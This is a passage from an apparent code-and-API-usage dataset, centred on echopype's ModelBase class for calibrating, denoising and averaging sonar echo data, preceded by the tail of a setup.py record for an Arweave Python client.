)
| [
"distutils.core.setup"
]
| [((34, 687), 'distutils.core.setup', 'setup', ([], {'name': '"""arweave-python-client"""', 'packages': "['arweave']", 'version': '"""1.0.15.dev0"""', 'description': '"""Client interface for sending transactions on the Arweave permaweb"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/MikeHibbert/arweave-python-client"""', 'download_url': '"""https://github.com/MikeHibbert/arweave-python-client"""', 'keywords': "['arweave', 'crypto']", 'classifiers': "['Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent']", 'install_requires': "['arrow', 'python-jose', 'pynacl', 'pycryptodome', 'cryptography',\n 'requests', 'psutil']"}), "(name='arweave-python-client', packages=['arweave'], version=\n '1.0.15.dev0', description=\n 'Client interface for sending transactions on the Arweave permaweb',\n author='<NAME>', author_email='<EMAIL>', url=\n 'https://github.com/MikeHibbert/arweave-python-client', download_url=\n 'https://github.com/MikeHibbert/arweave-python-client', keywords=[\n 'arweave', 'crypto'], classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent'], install_requires=['arrow',\n 'python-jose', 'pynacl', 'pycryptodome', 'cryptography', 'requests',\n 'psutil'])\n", (39, 687), False, 'from distutils.core import setup\n')] |
"""
echopype data model that keeps tracks of echo data and
its connection to data files.
"""
import os
import warnings
import datetime as dt
from echopype.utils import uwa
import numpy as np
import xarray as xr
class ModelBase(object):
"""Class for manipulating echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
self.file_path = file_path # this passes the input through file name test
self.noise_est_range_bin_size = 5 # meters per tile for noise estimation
self.noise_est_ping_size = 30 # number of pings per tile for noise estimation
self.MVBS_range_bin_size = 5 # meters per tile for MVBS
self.MVBS_ping_size = 30 # number of pings per tile for MVBS
self.Sv = None # calibrated volume backscattering strength
self.Sv_path = None # path to save calibrated results
self.Sv_clean = None # denoised volume backscattering strength
self.TS = None # calibrated target strength
self.TS_path = None # path to save TS calculation results
self.MVBS = None # mean volume backscattering strength
self._salinity = None
self._temperature = None
self._pressure = None
self._sound_speed = None
self._sample_thickness = None
self._range = None
self._seawater_absorption = None
@property
def salinity(self):
return self._salinity
@salinity.setter
def salinity(self, sal):
self._salinity = sal
@property
def pressure(self):
return self._pressure
@pressure.setter
def pressure(self, pres):
self._pressure = pres
@property
def temperature(self):
return self._temperature
@temperature.setter
def temperature(self, t):
self._temperature = t
@property
def sample_thickness(self):
return self._sample_thickness
@sample_thickness.setter
def sample_thickness(self, sth):
self._sample_thickness = sth
@property
def range(self):
return self._range
@range.setter
def range(self, rr):
self._range = rr
@property
def seawater_absorption(self):
return self._seawater_absorption
@seawater_absorption.setter
def seawater_absorption(self, absorption):
self._seawater_absorption.values = absorption
@property
def sound_speed(self):
return self._sound_speed
@sound_speed.setter
def sound_speed(self, ss):
if isinstance(self._sound_speed, xr.DataArray):
self._sound_speed.values = ss
else:
self._sound_speed = ss
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, p):
self._file_path = p
# Load netCDF groups if file format is correct
pp = os.path.basename(p)
_, ext = os.path.splitext(pp)
supported_ext_list = ['.raw', '.01A']
if ext in supported_ext_list:
print('Data file in manufacturer format, please convert to .nc first.')
elif ext == '.nc':
self.toplevel = xr.open_dataset(self.file_path)
# Get .nc filenames for storing processed data if computation is performed
self.Sv_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv.nc')
self.Sv_clean_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv_clean.nc')
self.TS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_TS.nc')
self.MVBS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_MVBS.nc')
# Raise error if the file format convention does not match
if self.toplevel.sonar_convention_name != 'SONAR-netCDF4':
raise ValueError('netCDF file convention not recognized.')
self.toplevel.close()
else:
raise ValueError('Data file format not recognized.')
def calc_sound_speed(self, src='file'):
"""Base method to be overridden for calculating sound_speed for different sonar models
"""
# issue warning when subclass methods not available
print("Sound speed calculation has not been implemented for this sonar model!")
def calc_seawater_absorption(self, src='file'):
"""Base method to be overridden for calculating seawater_absorption for different sonar models
"""
# issue warning when subclass methods not available
print("Seawater absorption calculation has not been implemented for this sonar model!")
def calc_sample_thickness(self):
"""Base method to be overridden for calculating sample_thickness for different sonar models.
"""
# issue warning when subclass methods not available
print('Sample thickness calculation has not been implemented for this sonar model!')
def calc_range(self):
"""Base method to be overridden for calculating range for different sonar models.
"""
# issue warning when subclass methods not available
print('Range calculation has not been implemented for this sonar model!')
def recalculate_environment(self, ss=True, sa=True, st=True, r=True):
""" Recalculates sound speed, seawater absorption, sample thickness, and range using
salinity, temperature, and pressure
Parameters
----------
ss : bool
Whether to calcualte sound speed. Defaults to `True`
sa : bool
Whether to calcualte seawater absorption. Defaults to `True`
st : bool
Whether to calcualte sample thickness. Defaults to `True`
r : bool
Whether to calcualte range. Defaults to `True`
"""
s, t, p = self.salinity, self.temperature, self.pressure
if s is not None and t is not None and p is not None:
if ss:
self.sound_speed = self.calc_sound_speed(src='user')
if sa:
self.seawater_absorption = self.calc_seawater_absorption(src='user')
if st:
self.sample_thickness = self.calc_sample_thickness()
if r:
self.range = self.calc_range()
elif s is None:
print("Salinity was not provided. Environment was not recalculated")
elif t is None:
print("Temperature was not provided. Environment was not recalculated")
else:
print("Pressure was not provided. Environment was not recalculated")
def calibrate(self):
"""Base method to be overridden for volume backscatter calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Calibration has not been implemented for this sonar model!')
def calibrate_TS(self):
"""Base method to be overridden for target strength calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Target strength calibration has not been implemented for this sonar model!')
def validate_path(self, save_path, save_postfix):
"""Creates a directory if it doesnt exist. Returns a valid save path.
"""
def _assemble_path():
file_in = os.path.basename(self.file_path)
file_name, file_ext = os.path.splitext(file_in)
return file_name + save_postfix + file_ext
if save_path is None:
save_dir = os.path.dirname(self.file_path)
file_out = _assemble_path()
else:
path_ext = os.path.splitext(save_path)[1]
# If given save_path is file, split into directory and file
if path_ext != '':
save_dir, file_out = os.path.split(save_path)
if save_dir == '': # save_path is only a filename without directory
save_dir = os.path.dirname(self.file_path) # use directory from input file
# If given save_path is a directory, get a filename from input .nc file
else:
save_dir = save_path
file_out = _assemble_path()
# Create folder if not already exists
if save_dir == '':
# TODO: should we use '.' instead of os.getcwd()?
save_dir = os.getcwd() # explicit about path to current directory
if not os.path.exists(save_dir):
os.mkdir(save_dir)
return os.path.join(save_dir, file_out)
@staticmethod
def get_tile_params(r_data_sz, p_data_sz, r_tile_sz, p_tile_sz, sample_thickness):
"""Obtain ping_time and range_bin parameters associated with groupby and groupby_bins operations.
These parameters are used in methods remove_noise(), noise_estimates(), get_MVBS().
Parameters
----------
r_data_sz : int
number of range_bin entries in data
p_data_sz : int
number of ping_time entries in data
r_tile_sz : float
tile size along the range_bin dimension [m]
p_tile_sz : int
tile size along the ping_time dimension [number of pings]
sample_thickness : float
thickness of each data sample, determined by sound speed and pulse duration
Returns
-------
r_tile_sz : int
modified tile size along the range dimension [m], determined by sample_thickness
r_tile_bin_edge : list of int
bin edges along the range_bin dimension for :py:func:`xarray.DataArray.groupby_bins` operation
p_tile_bin_edge : list of int
bin edges along the ping_time dimension for :py:func:`xarray.DataArray.groupby_bins` operation
"""
# Adjust noise_est_range_bin_size because range_bin_size may be an inconvenient value
num_r_per_tile = np.round(r_tile_sz / sample_thickness).astype(int) # num of range_bin per tile
r_tile_sz = num_r_per_tile * sample_thickness
# Total number of range_bin and ping tiles
num_tile_range_bin = np.ceil(r_data_sz / num_r_per_tile).astype(int)
if np.mod(p_data_sz, p_tile_sz) == 0:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int) + 1
else:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int)
# Tile bin edges along range
# ... -1 to make sure each bin has the same size because of the right-inclusive and left-exclusive bins
r_tile_bin_edge = [np.arange(x.values + 1) * y.values - 1 for x, y in zip(num_tile_range_bin, num_r_per_tile)]
p_tile_bin_edge = np.arange(num_tile_ping + 1) * p_tile_sz - 1
return r_tile_sz, r_tile_bin_edge, p_tile_bin_edge
def _get_proc_Sv(self, source_path=None, source_postfix='_Sv'):
"""Private method to return calibrated Sv either from memory or _Sv.nc file.
This method is called by remove_noise(), noise_estimates() and get_MVBS().
"""
if self.Sv is None: # calibration not yet performed
Sv_path = self.validate_path(save_path=source_path, # wrangle _Sv path
save_postfix=source_postfix)
if os.path.exists(Sv_path): # _Sv exists
self.Sv = xr.open_dataset(Sv_path) # load _Sv file
else:
# if path specification given but file do not exist:
if (source_path is not None) or (source_postfix != '_Sv'):
print('%s no calibrated data found in specified path: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), Sv_path))
else:
print('%s data has not been calibrated. ' % dt.datetime.now().strftime('%H:%M:%S'))
print(' performing calibration now and operate from Sv in memory.')
self.calibrate() # calibrate, have Sv in memory
return self.Sv
def remove_noise(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None,
SNR=0, Sv_threshold=None,
save=False, save_postfix='_Sv_clean', save_path=None):
"""Remove noise by using noise estimates obtained from the minimum mean calibrated power level
along each column of tiles.
See method noise_estimates() for details of noise estimation.
Reference: <NAME> & Higginbottom, 2017, ICES Journal of Marine Sciences
Parameters
----------
source_postfix : str
postfix of the Sv file used to remove noise from, default to '_Sv'
source_path : str
path of Sv file used to remove noise from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float, optional
Meters per tile for noise estimation [m]
noise_est_ping_size : int, optional
Number of pings per tile for noise estimation
SNR : int, optional
Minimum signal-to-noise ratio (remove values below this after general noise removal).
Sv_threshold : int, optional
Minimum Sv threshold [dB] (remove values below this after general noise removal)
save : bool, optional
Whether to save the denoised Sv (``Sv_clean``) into a new .nc file.
Default to ``False``.
save_postfix : str
Filename postfix, default to '_Sv_clean'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_Sv_clean.nc default
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Get calibrated Sv
if self.Sv is not None:
print('%s Remove noise from Sv stored in memory.' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
print('%s Remove noise from Sv stored in: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Get TVG and ABS for compensating for transmission loss
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Function for use with apply
def remove_n(x, rr):
p_c_lin = 10 ** ((x.Sv - x.ABS - x.TVG) / 10)
nn = 10 * np.log10(p_c_lin.mean(dim='ping_time').groupby_bins('range_bin', rr).mean().min(
dim='range_bin_bins')) + x.ABS + x.TVG
# Return values where signal is [SNR] dB above noise and at least [Sv_threshold] dB
if not Sv_threshold:
return x.Sv.where(x.Sv > (nn + SNR), other=np.nan)
else:
return x.Sv.where((x.Sv > (nn + SNR)) & (x > Sv_threshold), other=np.nan)
# Groupby noise removal operation
proc_data.coords['ping_idx'] = ('ping_time', np.arange(proc_data.Sv['ping_time'].size))
ABS.name = 'ABS'
TVG.name = 'TVG'
pp = xr.merge([proc_data, ABS])
pp = xr.merge([pp, TVG])
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
Sv_clean = pp.groupby_bins('ping_idx', ping_tile_bin_edge).\
map(remove_n, rr=range_bin_tile_bin_edge[0])
Sv_clean = Sv_clean.drop_vars(['ping_idx'])
else:
tmp_clean = []
cnt = 0
for key, val in pp.groupby('frequency'): # iterate over different frequency channel
tmp = val.groupby_bins('ping_idx', ping_tile_bin_edge). \
map(remove_n, rr=range_bin_tile_bin_edge[cnt])
cnt += 1
tmp_clean.append(tmp)
clean_val = np.array([zz.values for zz in xr.align(*tmp_clean, join='outer')])
Sv_clean = xr.DataArray(clean_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_clean[0]['ping_time'].values,
'range_bin': tmp_clean[0]['range_bin'].values},
dims=['frequency', 'ping_time', 'range_bin'])
# Set up DataSet
Sv_clean.name = 'Sv'
Sv_clean = Sv_clean.to_dataset()
Sv_clean['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
Sv_clean.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Attach calculated range into data set
Sv_clean['range'] = (('frequency', 'range_bin'), self.range.T)
# Save as object attributes as a netCDF file
self.Sv_clean = Sv_clean
# TODO: now adding the below so that MVBS can be calculated directly
# from the cleaned Sv without saving and loading Sv_clean from disk.
# However this is not explicit to the user. A better way to do this
# is to change get_MVBS() to first check existence of self.Sv_clean
# when `_Sv_clean` is specified as the source_postfix.
if not print_src: # remove noise from Sv stored in memory
self.Sv = Sv_clean.copy()
if save:
self.Sv_clean_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving denoised Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_clean_path))
Sv_clean.to_netcdf(self.Sv_clean_path)
# Close opened resources
proc_data.close()
def noise_estimates(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None):
"""Obtain noise estimates from the minimum mean calibrated power level along each column of tiles.
The tiles here are defined by class attributes noise_est_range_bin_size and noise_est_ping_size.
This method contains redundant pieces of code that also appear in method remove_noise(),
but this method can be used separately to determine the exact tile size for noise removal before
noise removal is actually performed.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate noise estimates from, default to '_Sv'
source_path : str
path of Sv file used to calculate noise estimates from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float
meters per tile for noise estimation [m]
noise_est_ping_size : int
number of pings per tile for noise estimation
Returns
-------
noise_est : xarray DataSet
noise estimates as a DataArray with dimension [ping_time x range_bin]
ping_time and range_bin are taken from the first element of each tile along each of the dimensions
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Use calibrated data to calculate noise removal
proc_data = self._get_proc_Sv()
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Values for noise estimates
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Noise estimates
proc_data['power_cal'] = 10 ** ((proc_data.Sv - ABS - TVG) / 10)
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
noise_est = 10 * np.log10(proc_data['power_cal'].coarsen(
ping_time=self.noise_est_ping_size,
range_bin=int(np.unique(self.noise_est_range_bin_size / self.sample_thickness)),
boundary='pad').mean().min(dim='range_bin'))
else:
range_bin_coarsen_idx = (self.noise_est_range_bin_size / self.sample_thickness).astype(int)
tmp_noise = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(proc_data['power_cal'].sel(frequency=freq).coarsen(
ping_time=self.noise_est_ping_size,
range_bin=r_bin.values,
boundary='pad').mean().min(dim='range_bin'))
tmp_da.name = 'noise_est'
tmp_noise.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
noise_val = np.array([zz.values for zz in xr.align(*tmp_noise, join='outer')])
noise_est = xr.DataArray(noise_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_noise[0]['ping_time'].values},
dims=['frequency', 'ping_time'])
noise_est = noise_est.to_dataset(name='noise_est')
noise_est['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
noise_est.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Close opened resources
proc_data.close()
return noise_est
def get_MVBS(self, source_postfix='_Sv', source_path=None,
MVBS_range_bin_size=None, MVBS_ping_size=None,
save=False, save_postfix='_MVBS', save_path=None):
"""Calculate Mean Volume Backscattering Strength (MVBS).
The calculation uses class attributes MVBS_ping_size and MVBS_range_bin_size to
calculate and save MVBS as a new attribute to the calling EchoData instance.
MVBS is an xarray DataArray with dimensions ``ping_time`` and ``range_bin``
that are from the first elements of each tile along the corresponding dimensions
in the original Sv or Sv_clean DataArray.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate MVBS, default to '_Sv'
source_path : str
path of Sv file used to calculate MVBS, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
MVBS_range_bin_size : float, optional
meters per tile for calculating MVBS [m]
MVBS_ping_size : int, optional
number of pings per tile for calculating MVBS
save : bool, optional
whether to save the calculated MVBS into a new .nc file, default to ``False``
save_postfix : str
Filename postfix, default to '_MVBS'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_MVBS.nc default
"""
# Check params
if (MVBS_range_bin_size is not None) and (self.MVBS_range_bin_size != MVBS_range_bin_size):
self.MVBS_range_bin_size = MVBS_range_bin_size
if (MVBS_ping_size is not None) and (self.MVBS_ping_size != MVBS_ping_size):
self.MVBS_ping_size = MVBS_ping_size
# Get Sv by validating path and calibrate if not already done
if self.Sv is not None:
print('%s use Sv stored in memory to calculate MVBS' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
if self.Sv_path is not None:
print('%s Sv source used to calculate MVBS: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
else:
print('%s Sv source used to calculate MVBS: memory' %
dt.datetime.now().strftime('%H:%M:%S'))
# Get tile indexing parameters
self.MVBS_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.MVBS_range_bin_size,
p_tile_sz=self.MVBS_ping_size,
sample_thickness=self.sample_thickness)
# Calculate MVBS
Sv_linear = 10 ** (proc_data.Sv / 10) # convert to linear domain before averaging
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
MVBS = 10 * np.log10(Sv_linear.coarsen(
ping_time=self.MVBS_ping_size,
range_bin=int(np.unique(self.MVBS_range_bin_size / self.sample_thickness)),
boundary='pad').mean())
MVBS.coords['range_bin'] = ('range_bin', np.arange(MVBS['range_bin'].size))
else:
range_bin_coarsen_idx = (self.MVBS_range_bin_size / self.sample_thickness).astype(int)
tmp_MVBS = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(Sv_linear.sel(frequency=freq).coarsen(
ping_time=self.MVBS_ping_size,
range_bin=r_bin.values,
boundary='pad').mean())
tmp_da.coords['range_bin'] = ('range_bin', np.arange(tmp_da['range_bin'].size))
tmp_da.name = 'MVBS'
tmp_MVBS.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
MVBS_val = np.array([zz.values for zz in xr.align(*tmp_MVBS, join='outer')])
MVBS = xr.DataArray(MVBS_val,
coords={'frequency': Sv_linear['frequency'].values,
'ping_time': tmp_MVBS[0]['ping_time'].values,
'range_bin': np.arange(MVBS_val.shape[2])},
dims=['frequency', 'ping_time', 'range_bin']).dropna(dim='range_bin', how='all')
# Set MVBS attributes
MVBS.name = 'MVBS'
MVBS = MVBS.to_dataset()
MVBS['MVBS_range_bin_size'] = ('frequency', self.MVBS_range_bin_size)
MVBS.attrs['MVBS_ping_size'] = self.MVBS_ping_size
# Save results in object and as a netCDF file
self.MVBS = MVBS
if save:
self.MVBS_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving MVBS to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.MVBS_path))
MVBS.to_netcdf(self.MVBS_path)
# Close opened resources
proc_data.close()
| [
"numpy.array",
"xarray.align",
"numpy.mod",
"numpy.arange",
"os.path.exists",
"xarray.merge",
"os.path.split",
"os.mkdir",
"numpy.round",
"numpy.ceil",
"os.path.splitext",
"os.path.dirname",
"xarray.open_dataset",
"numpy.unique",
"os.path.join",
"os.getcwd",
"datetime.datetime.now",
"os.path.basename",
"xarray.DataArray"
]
| [((2910, 2929), 'os.path.basename', 'os.path.basename', (['p'], {}), '(p)\n', (2926, 2929), False, 'import os\n'), ((2947, 2967), 'os.path.splitext', 'os.path.splitext', (['pp'], {}), '(pp)\n', (2963, 2967), False, 'import os\n'), ((8945, 8977), 'os.path.join', 'os.path.join', (['save_dir', 'file_out'], {}), '(save_dir, file_out)\n', (8957, 8977), False, 'import os\n'), ((16839, 16865), 'xarray.merge', 'xr.merge', (['[proc_data, ABS]'], {}), '([proc_data, ABS])\n', (16847, 16865), True, 'import xarray as xr\n'), ((16879, 16898), 'xarray.merge', 'xr.merge', (['[pp, TVG]'], {}), '([pp, TVG])\n', (16887, 16898), True, 'import xarray as xr\n'), ((7771, 7803), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (7787, 7803), False, 'import os\n'), ((7838, 7863), 'os.path.splitext', 'os.path.splitext', (['file_in'], {}), '(file_in)\n', (7854, 7863), False, 'import os\n'), ((7973, 8004), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (7988, 8004), False, 'import os\n'), ((8801, 8812), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (8810, 8812), False, 'import os\n'), ((8872, 8896), 'os.path.exists', 'os.path.exists', (['save_dir'], {}), '(save_dir)\n', (8886, 8896), False, 'import os\n'), ((8910, 8928), 'os.mkdir', 'os.mkdir', (['save_dir'], {}), '(save_dir)\n', (8918, 8928), False, 'import os\n'), ((10609, 10637), 'numpy.mod', 'np.mod', (['p_data_sz', 'p_tile_sz'], {}), '(p_data_sz, p_tile_sz)\n', (10615, 10637), True, 'import numpy as np\n'), ((11689, 11712), 'os.path.exists', 'os.path.exists', (['Sv_path'], {}), '(Sv_path)\n', (11703, 11712), False, 'import os\n'), ((16733, 16774), 'numpy.arange', 'np.arange', (["proc_data.Sv['ping_time'].size"], {}), "(proc_data.Sv['ping_time'].size)\n", (16742, 16774), True, 'import numpy as np\n'), ((17741, 17966), 'xarray.DataArray', 'xr.DataArray', (['clean_val'], {'coords': "{'frequency': proc_data['frequency'].values, 'ping_time': tmp_clean[0][\n 'ping_time'].values, 'range_bin': tmp_clean[0]['range_bin'].values}", 'dims': "['frequency', 'ping_time', 'range_bin']"}), "(clean_val, coords={'frequency': proc_data['frequency'].values,\n 'ping_time': tmp_clean[0]['ping_time'].values, 'range_bin': tmp_clean[0\n ]['range_bin'].values}, dims=['frequency', 'ping_time', 'range_bin'])\n", (17753, 17966), True, 'import xarray as xr\n'), ((23685, 23849), 'xarray.DataArray', 'xr.DataArray', (['noise_val'], {'coords': "{'frequency': proc_data['frequency'].values, 'ping_time': tmp_noise[0][\n 'ping_time'].values}", 'dims': "['frequency', 'ping_time']"}), "(noise_val, coords={'frequency': proc_data['frequency'].values,\n 'ping_time': tmp_noise[0]['ping_time'].values}, dims=['frequency',\n 'ping_time'])\n", (23697, 23849), True, 'import xarray as xr\n'), ((3192, 3223), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {}), '(self.file_path)\n', (3207, 3223), True, 'import xarray as xr\n'), ((8082, 8109), 'os.path.splitext', 'os.path.splitext', (['save_path'], {}), '(save_path)\n', (8098, 8109), False, 'import os\n'), ((8253, 8277), 'os.path.split', 'os.path.split', (['save_path'], {}), '(save_path)\n', (8266, 8277), False, 'import os\n'), ((10335, 10373), 'numpy.round', 'np.round', (['(r_tile_sz / sample_thickness)'], {}), '(r_tile_sz / sample_thickness)\n', (10343, 10373), True, 'import numpy as np\n'), ((10550, 10585), 'numpy.ceil', 'np.ceil', (['(r_data_sz / num_r_per_tile)'], {}), '(r_data_sz / num_r_per_tile)\n', (10557, 10585), True, 'import numpy as np\n'), ((11099, 11127), 'numpy.arange', 'np.arange', (['(num_tile_ping + 1)'], {}), '(num_tile_ping + 1)\n', (11108, 11127), True, 'import numpy as np\n'), ((11754, 11778), 'xarray.open_dataset', 'xr.open_dataset', (['Sv_path'], {}), '(Sv_path)\n', (11769, 11778), True, 'import xarray as xr\n'), ((28184, 28217), 'numpy.arange', 'np.arange', (["MVBS['range_bin'].size"], {}), "(MVBS['range_bin'].size)\n", (28193, 28217), True, 'import numpy as np\n'), ((3352, 3383), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3367, 3383), False, 'import os\n'), ((3537, 3568), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3552, 3568), False, 'import os\n'), ((3728, 3759), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3743, 3759), False, 'import os\n'), ((3909, 3940), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (3924, 3940), False, 'import os\n'), ((8394, 8425), 'os.path.dirname', 'os.path.dirname', (['self.file_path'], {}), '(self.file_path)\n', (8409, 8425), False, 'import os\n'), ((10761, 10791), 'numpy.ceil', 'np.ceil', (['(p_data_sz / p_tile_sz)'], {}), '(p_data_sz / p_tile_sz)\n', (10768, 10791), True, 'import numpy as np\n'), ((10981, 11004), 'numpy.arange', 'np.arange', (['(x.values + 1)'], {}), '(x.values + 1)\n', (10990, 11004), True, 'import numpy as np\n'), ((28740, 28775), 'numpy.arange', 'np.arange', (["tmp_da['range_bin'].size"], {}), "(tmp_da['range_bin'].size)\n", (28749, 28775), True, 'import numpy as np\n'), ((10672, 10702), 'numpy.ceil', 'np.ceil', (['(p_data_sz / p_tile_sz)'], {}), '(p_data_sz / p_tile_sz)\n', (10679, 10702), True, 'import numpy as np\n'), ((17681, 17715), 'xarray.align', 'xr.align', (['*tmp_clean'], {'join': '"""outer"""'}), "(*tmp_clean, join='outer')\n", (17689, 17715), True, 'import xarray as xr\n'), ((23624, 23658), 'xarray.align', 'xr.align', (['*tmp_noise'], {'join': '"""outer"""'}), "(*tmp_noise, join='outer')\n", (23632, 23658), True, 'import xarray as xr\n'), ((29015, 29048), 'xarray.align', 'xr.align', (['*tmp_MVBS'], {'join': '"""outer"""'}), "(*tmp_MVBS, join='outer')\n", (29023, 29048), True, 'import xarray as xr\n'), ((14963, 14980), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (14978, 14980), True, 'import datetime as dt\n'), ((17000, 17011), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (17008, 17011), True, 'import numpy as np\n'), ((22541, 22552), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (22549, 22552), True, 'import numpy as np\n'), ((26586, 26603), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (26601, 26603), True, 'import datetime as dt\n'), ((27837, 27848), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (27845, 27848), True, 'import numpy as np\n'), ((3442, 3474), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3458, 3474), False, 'import os\n'), ((3633, 3665), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3649, 3665), False, 'import os\n'), ((3818, 3850), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (3834, 3850), False, 'import os\n'), ((4001, 4033), 'os.path.basename', 'os.path.basename', (['self.file_path'], {}), '(self.file_path)\n', (4017, 4033), False, 'import os\n'), ((15274, 15291), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (15289, 15291), True, 'import datetime as dt\n'), ((19234, 19251), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (19249, 19251), True, 'import datetime as dt\n'), ((27114, 